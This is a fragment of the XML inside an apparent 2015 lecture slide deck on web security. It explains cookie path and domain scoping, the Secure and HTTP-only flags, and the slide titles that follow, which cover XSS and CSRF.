              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http only flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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Content Placeholder 4" descr="Screen Shot 2015-02-25 at 9.48.24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78" t="-104536" r="-122012" b="30997"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4773082" y="1706563"/>
            <a:ext cx="3761317" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2015-02-25 at 9.4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119373"/>
            <a:ext cx="5346700" cy="3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path separation: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>X.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/A does not see cookies of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>X.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is not a security measure, though – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>X.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/A can access the DOM of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>X.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Really only done for efficiency: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>X.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/A doesn’t need to be repeatedly sent cookies for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>X.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, browser should enforce some safety – it’s just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5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Expiration must be positive, or else cookie is deleted on browser closing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Domain name can be for a TLD or subdomain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only hosts within a domain can set a cookie for that domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subdomain can set for one domain higher, but higher domain can’t set for lower ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similarly, subdomain can access for higher, but not the other way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one.mail.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> could access cookies for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, but could not set them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rules are enforced at browser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By default, cookies are transmitted unencrypted using HTTP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So can be targeted by MITM attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure flag can be set, which requires the cookie be transmitted by HTTPS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, vulnerabilities have been found on web sites where HTTPS traffic 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set this flag correctly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Contents can also be separately encrypted, so server then has to decrypt.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HTTP-only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HTTP-only flag is set, scripting languages (such as JavaScript) are prevented from accessing or manipulating cookies stored on the client machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Doesn’t stop cookies use – browser automatically still sends to domain that owns it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, preventing scripting languages from accessing cookies does help prevent XSS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More on this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1653</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>173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More on web security</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Example (cont)</vt:lpstr>
      <vt:lpstr>What’s in a cookie?</vt:lpstr>
      <vt:lpstr>Cookie details</vt:lpstr>
      <vt:lpstr>Details</vt:lpstr>
      <vt:lpstr>Cookies and encryption</vt:lpstr>
      <vt:lpstr>HTTP-only flag</vt:lpstr>
      <vt:lpstr>Accessing cookies</vt:lpstr>
      <vt:lpstr>Security concerns</vt:lpstr>
      <vt:lpstr>Cross site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Persistent (or stored) XSS</vt:lpstr>
      <vt:lpstr>Persistent XSS</vt:lpstr>
      <vt:lpstr>Better examples</vt:lpstr>
      <vt:lpstr>Non persistent XSS</vt:lpstr>
      <vt:lpstr>Non persistent XSS</vt:lpstr>
      <vt:lpstr>Example non-persistent XSS</vt:lpstr>
      <vt:lpstr>XSS defenses</vt:lpstr>
      <vt:lpstr>XSS defenses</vt:lpstr>
      <vt:lpstr>XSS defense evasion</vt:lpstr>
      <vt:lpstr>XSS evasion (cont)</vt:lpstr>
      <vt:lpstr>XSS worms</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery</vt:lpstr>
      <vt:lpstr>CSRF: Other examples</vt:lpstr>
      <vt:lpstr>CSRF: Key</vt:lpstr>
      <vt:lpstr>CSRF defenses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web security</dc:title>
  <dc:creator>Default User</dc:creator>
  <cp:lastModifiedBy>Default User</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-02-24T14:47:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-02-26T18:33:52Z</dcterms:modified>
</cp:coreProperties>
</file>